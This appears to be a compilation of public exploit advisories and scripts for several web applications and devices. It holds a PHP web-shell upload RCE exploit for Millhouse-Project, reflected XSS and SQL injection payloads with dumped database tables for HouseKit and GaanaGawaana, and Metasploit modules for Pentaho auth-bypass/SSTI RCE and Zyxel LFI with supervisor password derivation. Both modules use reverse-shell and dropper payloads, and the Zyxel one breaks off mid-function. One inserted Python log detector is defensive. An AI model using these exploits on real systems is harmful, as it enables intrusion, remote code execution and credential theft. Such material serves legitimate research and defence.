<pre><code><?php
/*
Exploit Title: thrsrossi Millhouse-Project 1.414 - register - Reflected XSS
Date: 12/05/2023
Exploit Author: Chokri Hammedi
Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
Software Link: https://github.com/thrsrossi/Millhouse-Project.git
Version: 1.414
Tested on: Debian
CVE: N/A
*/
?>

POC:

http://target/views/register.php?error=%3Cscript%3Ealert(%27rose1337%27)%3C/script%3E
</code></pre>
<pre><code><?php
/*
Exploit Title: thrsrossi Millhouse-Project 1.414 Remote Code Execution
Date: 12/05/2023
Exploit Author: Chokri Hammedi
Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
Software Link: https://github.com/thrsrossi/Millhouse-Project.git
Version: 1.414
Tested on: Debian
CVE: N/A
*/

$options = getopt('u:c:');

if (!isset($options['u'], $options['c'])) {
    die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\033[0m\n\n");
}

$target  = $options['u'];
$command = $options['c'];

// post-creation handler that stores the uploaded "image" part under /images/ without checking its type
$url = $target . '/includes/add_post_sql.php';

// multipart body: the "image" field carries a PHP file instead of an image
$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="title"

helloworld
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="description"

<p>sdsdsds</p>
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="category"

1
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="image"; filename="rose.php"
Content-Type: application/x-php

<?php
$shell = shell_exec("' . $command . '");
echo $shell;
?>

------WebKitFormBoundaryzlHN0BEvvaJsDgh8--
';

// the boundary header must stay on one line; the body uses the same boundary prefixed with "--"
$headers = array(
    'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',
    'Cookie: PHPSESSID=rose1337',
);

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

$response = curl_exec($ch);
curl_close($ch);

// execute command by requesting the uploaded file from the web root

$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);
$ch = curl_init($shell);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$exec_shell = curl_exec($ch);
curl_close($ch);
echo "\033[1;32m \n" . $exec_shell . "\033[0m\n \n";

?>
</code></pre>
<pre><code>CraCkEr - THE CRACK OF ETERNAL MIGHT
From The Ashes and Dust Rises An Unimaginable crack....

[ Vulnerability ]

Author    : CraCkEr
Website   : codesler.com
Vendor    : Codesler - Rohit Chouhan (codester.com)
Software  : HouseKit 1.0 - Rent Property Booking PHP Script
Vuln Type : Reflected XSS
Impact    : Manipulate the content of the site

Release Notes:
==============
The attacker can send the victim a link containing a malicious URL in an email or
instant message and can perform a wide variety of actions, such as stealing the
victim's session token or login credentials.

Greets:

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL

CryptoJob (Twitter) twitter.com/0x0CryptoJob

© CraCkEr 2023

Path: /flat_details.php

GET parameter 'id' is vulnerable to RXSS

https://website/flat_details.php?id=22&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E


Path: /flats.php

GET parameter 's' is vulnerable to RXSS

https://website/flats.php?tab=on&s=Hyderabadi3phy%3cscript%3ealert(1)%3c%2fscript%3ezx0nx


[-] Done
</code></pre>
<pre><code>CraCkEr - THE CRACK OF ETERNAL MIGHT
From The Ashes and Dust Rises An Unimaginable crack....

[ Vulnerability ]

Author    : CraCkEr
Website   : codesler.com
Vendor    : Codesler - Rohit Chouhan (codester.com)
Software  : HouseKit 1.0 - Rent Property Booking PHP Script
Vuln Type : SQL Injection
Impact    : Database Access

Release Notes:
==============
SQL injection attacks can allow unauthorized access to sensitive data and
modification of data, and can crash the application or make it unavailable,
leading to lost revenue and damage to a company's reputation.

Greets:

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL

CryptoJob (Twitter) twitter.com/0x0CryptoJob

© CraCkEr 2023

Path: /flat_details.php

GET parameter 'id' is vulnerable to SQL Injection

https://website/flat_details.php?id=[SQLI]

---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=22 AND (SELECT 2116 FROM (SELECT(SLEEP(5)))vxMc)

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: id=-4049 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b706271,0x4175424a73725a4b6b757359756765517a78784a6b50706b464f474978545652546a4a496c505841,0x716b6a6271),NULL,NULL,NULL-- -
---


Path: /flats.php

GET parameter 's' is vulnerable to SQL Injection

https://website/flats.php?tab=on&s=[SQLI]

---
Parameter: s (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: tab=on&s=Hyderabad' AND (SELECT 5046 FROM (SELECT(SLEEP(5)))BKYF) AND 'ReOi'='ReOi

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: tab=on&s=Hyderabad' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170706a71,0x6e536b46764c48414b6663545a4f78576a56794c74766e5351494f624c786261797255684d5a6d6d,0x716a767071),NULL,NULL,NULL-- -
---


[+] Starting the Attack

fetching current database

current database: '**40*26_housekit'


fetching tables

+--------------+
| admin        |
| flats        |
| kyc          |
| owner        |
| review       |
| settings     |
| transactions |
| users        |
| wallet       |
| withdraw     |
+--------------+


fetching columns for table 'admin'

+----------+---------+
| Column   | Type    |
+----------+---------+
| id       | int(11) |
| password | text    |
| username | text    |
+----------+---------+


[-] Done
</code></pre>
<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Pentaho Business Server Auth Bypass and Server Side Template Injection RCE',
        'Description' => %q{
          Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x is
          vulnerable to an authentication bypass (CVE-2022-43939) and a Server Side Template Injection (SSTI) vulnerability
          (CVE-2022-43769) that can be chained together to achieve unauthenticated code execution as the user
          running the Pentaho Business Analytics Server.

          The first vulnerability (CVE-2022-43939) is an authentication bypass which stems from a regex that allows any
          URL that ends in "/", followed by "require", optionally "-js" or "-cfg", any character, and then the string
          "js" followed optionally by "?" and then any characters of the attacker's choice.

          The second (CVE-2022-43769) is a server side template injection. This vulnerability allows RCE by making a
          GET request to /api/ldap/config/ldapTreeNodeChildren and setting the url parameter to Thymeleaf template code.
          By abusing the ability to execute arbitrary Java classes within Thymeleaf templates, an attacker can execute
          arbitrary commands as the user running the Pentaho Business Analytics Server.
        },
        'Author' => [
          'Harry Withington', # Discovery
          'dwbzn', # PoC
          'jheysel-r7' # Module
        ],
        'References' => [
          ['URL', 'https://github.com/dwbzn/pentaho-exploits/blob/main/cve-2022-43769.py'], # POC
          ['URL', 'https://research.aurainfosec.io/pentest/pentah0wnage/'], # Original writeup
          ['URL', 'https://support.pentaho.com/hc/en-us/articles/14455561548301'], # Advisory
          ['CVE', '2022-43769'], # RCE
          ['CVE', '2022-43939'] # Auth Bypass
        ],
        'License' => MSF_LICENSE,
        'Privileged' => false,
        'Platform' => ['win', 'unix'],
        'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_openssl'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => :curl,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp'
              }
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD,
              'Type' => :win_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
              }
            }
          ],
          [
            'Windows Dropper',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :win_dropper,
              'CmdStagerFlavor' => :certutil,
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'
              }
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2023-04-04',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [true, 'Base path', '/pentaho'])
      ]
    )
  end

  def check
    # This check method abuses the authentication bypass vulnerability CVE-2022-43939 to check exploitability. Due to a
    # bad regex in applicationContext-spring-security.xml endpoints that should not be accessible without authentication
    # are made accessible if the URL ends in "/", followed by "require", optionally "-js" or "-cfg", any character,
    # and then the string "js" followed optionally by "?" and then any characters of the attacker's choice.

    post_require_mixup = ['-cfg', '-js', ''].sample
    period_mixup = ['.', Rex::Text.rand_text_alphanumeric(1)].sample
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'api', 'ldap', 'config', 'ldapTreeNodeChildren', "require#{post_require_mixup}#{period_mixup}js")
    )

    return Exploit::CheckCode::Unknown unless res

    if res.code == 200 && res.body == '{}'
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def win_target?
    target.platform.names.include?('Windows')
  end

  def execute_command(cmd, _opts = {})
    java_payload = <<~JAVA.gsub(/^\s+/, '').tr("\n", '')
      {T(java.lang.Runtime).getRuntime().exec(
      new String[]{ #{win_target? ? '"cmd.exe", "/c", ' : '"/bin/sh", "-c", '}'#{cmd.gsub("'", "''")}'}
      )
      }
    JAVA

    post_require_mixup = ['-cfg', '-js', ''].sample
    period_mixup = ['.', Rex::Text.rand_text_alphanumeric(1)].sample

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'api', 'ldap', 'config', 'ldapTreeNodeChildren', "require#{post_require_mixup}#{period_mixup}js"),
      'vars_get' => {
        'url' => "##{java_payload}",
        'mgrDn' => Rex::Text.rand_text_alphanumeric(1..24),
        'pwd' => Rex::Text.rand_text_alphanumeric(1..24)
      },
      'uri_encode_mode' => 'hex-all' # Needed to encode \ as %5C so we don't run into bad character issues that cause failure on server.
    )

    unless res
      fail_with(Failure::UnexpectedReply, 'No response from the server when attempting to exploit')
    end

    unless res.code == 200
      fail_with(Failure::UnexpectedReply, "Unexpected response code:#{res.code}, when attempting to exploit")
    end

    unless res.body == 'false'
      fail_with(Failure::UnexpectedReply, "The response body from the exploit attempt indicates the attempt was
        unsuccessful. The response body should only contain 'false'. The response body
        returned was: '#{res.body}'")
    end
  end

  def exploit
    print_status('Attempting to exploit...')
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    when :win_cmd
      execute_command(payload.encoded)
    when :win_dropper
      execute_cmdstager
    end
  end
end
</code></pre>
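The module description above gives the shape of the broken allow-list regex (CVE-2022-43939) and names the `url` parameter of `/api/ldap/config/ldapTreeNodeChildren` that reaches the template engine (CVE-2022-43769). The following detector, added here and not part of the module or of Pentaho, turns those two statements into log-review rules and runs them over constructed access-log lines; the `/content/...` path is an assumed legitimate RequireJS asset used only to show the rule stays quiet on it.

```python
"""Flag Pentaho auth-bypass (CVE-2022-43939) and SSTI (CVE-2022-43769) attempts in web logs."""
import re
from urllib.parse import parse_qs, urlsplit

# The advisory describes the broken allow-list as: path ends in "/require",
# optionally "-js" or "-cfg", then ANY single character, then "js", optionally
# followed by "?" and anything.  The regex mirrors that wording; the query is
# split off before matching, so "$" anchors on the path alone.
BYPASS_SUFFIX = re.compile(r"/require(?:-js|-cfg)?(?P<sep>.)js$")

# Endpoint named in the advisory whose `url` parameter is rendered as a template.
SSTI_ENDPOINT = "/api/ldap/config/ldapTreeNodeChildren"

# Request line inside an Apache/nginx common or combined log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log, not real traffic.  The /content/... entry is an
# assumed legitimate RequireJS asset (real name not taken from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [04/Apr/2023:10:00:01 +0000] "GET /pentaho/Login HTTP/1.1" 200 1234
10.0.0.9 - - [04/Apr/2023:10:00:02 +0000] "GET /pentaho/api/ldap/config/ldapTreeNodeChildren/require-cfg.js HTTP/1.1" 200 2
10.0.0.9 - - [04/Apr/2023:10:00:03 +0000] "GET /pentaho/api/ldap/config/ldapTreeNodeChildren/requireXjs?url=%23%7BT(java.lang.Runtime).getRuntime().exec(%22id%22)%7D&mgrDn=a&pwd=b HTTP/1.1" 200 5
10.0.0.7 - - [04/Apr/2023:10:00:04 +0000] "GET /pentaho/content/common-ui/resources/web/require-cfg.js HTTP/1.1" 200 4567
"""


def classify(request_target):
    """Return the list of indicators matched by one request target (path plus query)."""
    parts = urlsplit(request_target)
    findings = []

    m = BYPASS_SUFFIX.search(parts.path)
    if m:
        # A genuine RequireJS asset is "require.js" or "require-cfg.js"; the module
        # randomises the separator, and anything but "." only exists to satisfy the regex.
        if m.group("sep") != ".":
            findings.append("bypass-suffix-nondot")
        # The REST API is never served as a .js asset, so the suffix on an /api/
        # path is the bypass even when the separator is a real dot.
        if "/api/" in parts.path:
            findings.append("bypass-suffix-on-api")

    if SSTI_ENDPOINT in parts.path:
        # parse_qs percent-decodes, so the template expression is visible here.
        url_param = parse_qs(parts.query).get("url", [""])[0]
        if "T(" in url_param or "Runtime" in url_param:
            findings.append("ssti-url-param")

    return findings


def scan(log_text):
    """Return [(request_target, findings)] for each log line matching at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = classify(m.group("target"))
        if findings:
            hits.append((m.group("target"), findings))
    return hits


if __name__ == "__main__":
    for target, findings in scan(SAMPLE_LOG):
        print(f"{', '.join(findings):50s} {target}")
```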
<pre><code>CraCkEr - THE CRACK OF ETERNAL MIGHT
From The Ashes and Dust Rises An Unimaginable crack....

[ Vulnerability ]

Author    : CraCkEr
Website   : codesler.com
Vendor    : Codesler - Rohit Chouhan (codester.com)
Software  : GaanaGawaana 1.0 - Music Platform PHP Script
Vuln Type : SQL Injection
Impact    : Database Access

Release Notes:
==============
SQL injection attacks can allow unauthorized access to sensitive data and
modification of data, and can crash the application or make it unavailable,
leading to lost revenue and damage to a company's reputation.

Greets:

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL

CryptoJob (Twitter) twitter.com/0x0CryptoJob

© CraCkEr 2023

Path: /search

https://website/search?q=[SQLI]

GET parameter 'q' is vulnerable to SQL Injection

---
Parameter: q (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: q=' AND (SELECT 3838 FROM (SELECT(SLEEP(5)))giXs) AND 'YaMa'='YaMa

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: q=' UNION ALL SELECT NULL,CONCAT(0x716b707671,0x436e596a66675a65667a6c6a574e675142484f46776b4265766847466958456f6f556c4d58465172,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---


[+] Starting the Attack

fetching current database

current database: '***01*6_gaanagawaana'


fetching tables

+----------+
| settings |
| songs    |
+----------+


fetching columns for table 'settings'

+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| api_key   | varchar(200) |
| email     | varchar(50)  |
| id        | int(11)      |
| password  | varchar(200) |
| site_name | longtext     |
| thumbnail | longtext     |
| username  | varchar(200) |
+-----------+--------------+

[-] Done
</code></pre>
<pre><code>CraCkEr - THE CRACK OF ETERNAL MIGHT
From The Ashes and Dust Rises An Unimaginable crack....

[ Vulnerability ]

Author    : CraCkEr
Website   : codesler.com
Vendor    : Codesler - Rohit Chouhan (codester.com)
Software  : GaanaGawaana 1.0 - Music Platform PHP Script
Vuln Type : Reflected XSS
Impact    : Manipulate the content of the site

Release Notes:
==============
The attacker can send the victim a link containing a malicious URL in an email or
instant message and can perform a wide variety of actions, such as stealing the
victim's session token or login credentials.

Greets:

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL

CryptoJob (Twitter) twitter.com/0x0CryptoJob

© CraCkEr 2023


Path: /search

GET parameter 'q' is vulnerable to RXSS

https://website/search?q=no8pa"><script>alert(1)</script>xb7qk

[-] Done
</code></pre>
<pre><code>## Title: textpattern-4.8.8 Session token in URL Vulnerability
## Author: nu11secur1ty
## Date: 05.10.2023
## Vendor: https://textpattern.com/
## Software: https://github.com/textpattern/textpattern/releases/tag/4.8.8
## Reference: https://portswigger.net/kb/issues/00500700_session-token-in-url,
https://cwe.mitre.org/data/definitions/200.html

## Description:
Sensitive information within URLs may be logged in various locations,
including the user's browser, the web server, and any forward or
reverse proxy servers between the two endpoints. URLs may also be
displayed on-screen, bookmarked or emailed around by users. They may
be disclosed to third parties via the Referer header when any off-site
links are followed. Placing session tokens into the URL increases the
risk that they will be captured by an attacker.

Issue detail: The URL in the request appears to contain a session
token within the query string:
http://pwnedhost7.com/textpattern-4.8.8/textpattern/index.php?logout=1&lang=en&_txp_token=64f17b3d874e3c5f9c728f03e1271c64

STATUS: Medium Vulnerability

[+] Exploit:
```GET
GET /textpattern-4.8.8/textpattern/index.php?event=diag HTTP/1.1
Host: pwnedhost7.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: txp_login=Admin%2C628717737574e8be05624bb2da74fb38; txp_login_public=d5f8d91942Admin
Connection: close

```
[+] Response:
```HTTP
HTTP/1.1 200 OK
Date: Wed, 10 May 2023 07:51:37 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Content-Security-Policy: frame-ancestors 'self'
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10725

<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
<meta charset="utf-8">
<meta name="robots" content="noindex, nofollow">
<title>Diagnostics - My site | Textpattern CMS</title>
<script src="vendo
...[SNIP]...
<input name="event" type="hidden" value="diag" /><a rel="external noopener" target="_blank" href="?event=diag&step=phpinfo&_txp_token=64f17b3d874e3c5f9c728f03e1271c64">PHP configuration <span class="ui-icon ui-icon-extlink">
```


## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/textpattern/2023/textpattern-4.8.8)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/05/textpattern-488-session-token-in-url.html)

## Time spent:
01:15:00
</code></pre>
<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'socket'
require 'digest/md5'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::SSH
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  attr_accessor :ssh_socket

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Zyxel chained RCE using LFI and weak password derivation algorithm',
        'Description' => %q{
          This module exploits multiple vulnerabilities in the `zhttpd` binary (/bin/zhttpd)
          and `zcmd` binary (/bin/zcmd). It is present on more than 40 Zyxel routers and CPE devices.
          The remote code execution vulnerability can be exploited by chaining the local file disclosure
          vulnerability in the zhttpd binary that allows an unauthenticated attacker to read the entire configuration
          of the router via the vulnerable endpoint `/Export_Log?/data/zcfg_config.json`.
          With this information disclosure, the attacker can determine if the router is reachable via ssh
          and use the second vulnerability in the `zcmd` binary to derive the `supervisor` password exploiting
          a weak implementation of a password derivation algorithm using the device serial number.

          After exploitation, an attacker will be able to execute any command as user `supervisor`.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Author of exploit chain and MSF module contributor
          'SEC Consult Vulnerability Lab',
          'Thomas Rinsma',
          'Bogi Napoleon Wennerstrøm'
        ],
        'References' => [
          ['CVE', '2023-28770'],
          ['URL', 'https://r.sec-consult.com/zyxsploit'],
          ['URL', 'https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/'],
          ['URL', 'https://th0mas.nl/2020/03/26/getting-root-on-a-zyxel-vmg8825-t50-router/'],
          ['URL', 'https://github.com/boginw/zyxel-vmg8825-keygen'],
          ['URL', 'https://attackerkb.com/topics/tPAvkwQgDK/cve-2023-28770']
        ],
        'DisclosureDate' => '2022-02-01',
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_MIPSBE],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_MIPSBE],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => ['printf', 'echo', 'bourne', 'wget', 'curl'],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            'Interactive SSH',
            {
              'DefaultOptions' => {
                'PAYLOAD' => 'generic/ssh/interact'
              },
              'Payload' => {
                'Compat' => {
                  'PayloadType' => 'ssh_interact'
                }
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 80,
          'SSL' => false,
          'SSH_TIMEOUT' => 30,
          'WfsDelay' => 5
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options(
      [
        OptBool.new('STORE_CRED', [false, 'Store credentials into the database.', true])
      ]
    )
    register_advanced_options(
      [
        OptInt.new('ConnectTimeout', [ true, 'Maximum number of seconds to establish a TCP connection', 10])
      ]
    )
  end

  # supervisor user password derivation functions (SerialNumMethod2 and 3) for Zyxel routers
  # based on the reverse-engineering analysis of Thomas Rinsma and Bogi Napoleon Wennerstrøm
  # https://github.com/boginw/zyxel-vmg8825-keygen

  def double_hash(input, size = 8)
    # ROUND 1
    # take the MD5 hash from the serial number SXXXXXXXXXXXX
    # this returns a hash of 32 char bytes.
    # read md5 hash per two char bytes, check if first char byte = '0', then make first byte char == second byte char
    # store two char bytes in round1 and continue with next two char bytes from the hash.
    md5_str_array = Digest::MD5.hexdigest(input).split(//)
    round1_str_array = Array.new(32)
    j = 0
    until j == 32
      if md5_str_array[j] == '0'
        round1_str_array[j] = md5_str_array[j + 1]
      else
        round1_str_array[j] = md5_str_array[j]
      end
      round1_str_array[j + 1] = md5_str_array[j + 1]
      j += 2
    end
    round1 = round1_str_array.join
    # ROUND 2
    # take the MD5 hash from the result of round1
    # returns a hash of 32 char bytes.
    # read md5 hash per two char bytes, check if first char byte = '0', then make first byte char == second byte char
    # store two char bytes in round2 and continue with next two char bytes.
    md5_str_array = Digest::MD5.hexdigest(round1).split(//)
    round2_str_array = Array.new(32)
    j = 0
    until j == 32
      if md5_str_array[j] == '0'
        round2_str_array[j] = md5_str_array[j + 1]
      else
        round2_str_array[j] = md5_str_array[j]
      end
      round2_str_array[j + 1] = md5_str_array[j + 1]
      j += 2
    end
    # ROUND 3
    # take the result of round2 and pick the number (size) of char bytes starting at index [0] and stepping by 3
    # to create the final password hash with the defined number (size) of alphanumeric characters and return the final result
    round3_str_array = Array.new(size)
    for i in 0..(size - 1) do
      round3_str_array[i] = round2_str_array[i * 3]
    end
    round3 = round3_str_array.join
    return round3
  end

  def mod3_key_generator(seed)
    # key generator function used in the SerialNumMethod3 password derivation function
    round4_array = Array.new(16, 0)
    found0s = 0
    found1s = 0
    found2s = 0

    while (found0s == 0) || (found1s == 0) || (found2s == 0)
      found0s = 0
      found1s = 0
      found2s = 0

      power_of_2 = 1
      seed += 1

      for i in 0..9 do
        round4_array[i] = (seed % (power_of_2 * 3) / power_of_2).floor
        if (round4_array[i] == 1)
          found1s += 1
        elsif (round4_array[i]) == 2
          found2s += 1
        else
          found0s += 1
        end
        power_of_2 = power_of_2 << 1
      end
    end
    return seed, round4_array
  end

  def serial_num_method2(serial_number)
    # SerialNumMethod2 password derivation function
    pwd = double_hash(serial_number)
    return pwd
  end

  def serial_num_method3(serial_number)
    # SerialNumMethod3 password derivation function

    # constant definitions
    keystr1_byte_array = 'IO'.bytes.to_a
    keystr2_byte_array = 'lo'.bytes.to_a
    keystr3_byte_array = '10'.bytes.to_a
    valstr_byte_array = '23456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnpqrstuvwxyz0123456789ABCDEF'.bytes.to_a
    offset1 = 0x8
    offset2 = 0x20

    round3 = double_hash(serial_number, 10)
    round3.upcase!
    round3_byte_array = round3.bytes.to_a

    md5_str = Digest::MD5.hexdigest(serial_number)
    md5_str_array = md5_str.split(//)
    offset = md5_str_array[2] + md5_str_array[3] + md5_str_array[4] + md5_str_array[5]

    result = mod3_key_generator(offset.to_i(16))
    offset = result[0]
    round4 = result[1]

    for i in 0..9 do
      if round4[i] == 1
        new_val = (((round3_byte_array[i] % 0x1a) * 0x1000000) >> 0x18) + 'A'.bytes.join.to_i
        round3_byte_array[i] = new_val
        for j in 0..1 do
          next unless (round3_byte_array[i] == keystr1_byte_array[j])

          index = offset1 + ((offset + j) % 0x18)
          round3_byte_array[i] = valstr_byte_array[index]
          break
        end
      elsif round4[i] == 2
        new_val = (((round3_byte_array[i] % 0x1a) * 0x1000000) >> 0x18) + 'a'.bytes.join.to_i
        round3_byte_array[i] = new_val
        for j in 0..1 do
          next unless (round3_byte_array[i] == keystr2_byte_array[j])

          index = offset2 + ((offset + j) % 0x18)
          round3_byte_array[i] = valstr_byte_array[index]
          break
        end
      else
        new_val = (((round3_byte_array[i] % 10) * 0x1000000) >> 0x18) + '0'.bytes.join.to_i
        round3_byte_array[i] = new_val
        for j in 0..1 do
          next unless (round3_byte_array[i] == keystr3_byte_array[j])

          var = ((offset + j) >> 0x1f) >> 0x1d
          index = ((offset + j + var) & 7) - var
          round3_byte_array[i] = valstr_byte_array[index]
          break
        end
      end
    end
    pwd = round3_byte_array.pack('C*')
    return pwd
  end

  def crack_supervisor_pwd(serial)
    # crack supervisor password using the device serial number
    # there are two confirmed hashing functions that can derive the supervisor password from the serial number:
    # SerialNumMethod2 and SerialNumMethod3
    # both password candidates will be returned as hashes

    hash_pwd = { 'method2' => nil, 'method3' => nil }
    # SerialNumMethod2
    hash_pwd['method2'] = serial_num_method2(serial)
    # SerialNumMethod3
    hash_pwd['method3'] = serial_num_method3(serial)

    print_status("Derived supervisor password using SerialNumMethod2: #{hash_pwd['method2']}")
    print_status("Derived supervisor password using SerialNumMethod3: #{hash_pwd['method3']}")
    return hash_pwd
  end

  def report_creds(user, pwd)
    credential_data = {
      module_fullname: fullname,
      username: user,
      private_data: pwd,
      private_type: :password,
      workspace_id: myworkspace_id,
      status: Metasploit::Model::Login::Status::UNTRIED
    }.merge(service_details)

    cred_res = create_credential_and_login(credential_data)
    unless cred_res.nil?
      print_status("Credentials for user:#{user} are added to the database.")
    end
  end

  def get_configuration
    # Get the device configuration by exploiting the LFI vulnerability
    return send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/Export_Log?/data/zcfg_config.json')
    })
  end

  # Initiate the process configuration exception class used in the process_configuration function
  class ProcessConfigException < StandardError
    attr_reader :exception_type

    def initialize(msg = 'This is my custom process config exception', exception_type = 'custom')
      @exception_type = exception_type
      super(msg)
    end
  end

  def process_configuration(res)
    # Initiate the instance variable config to store the configuration
    @config = {}

    # Parse the device configuration json file
    res_json = res.get_json_document
    if res_json.blank?
      raise ProcessConfigException.new 'No device configuration file found.', 'ConfigUnknown'
    end

    # process json output and retrieve information about supervisor user, ssh port and ssh WAN service status
    # Also grab hardware and software version including the serial number to crack the password of user supervisor
    @config['hardware'] = res_json.dig('DeviceInfo', 'HardwareVersion')
    @config['software'] = res_json.dig('DeviceInfo', 'SoftwareVersion')
    @config['serial'] = res_json.dig('DeviceInfo', 'SerialNumber')

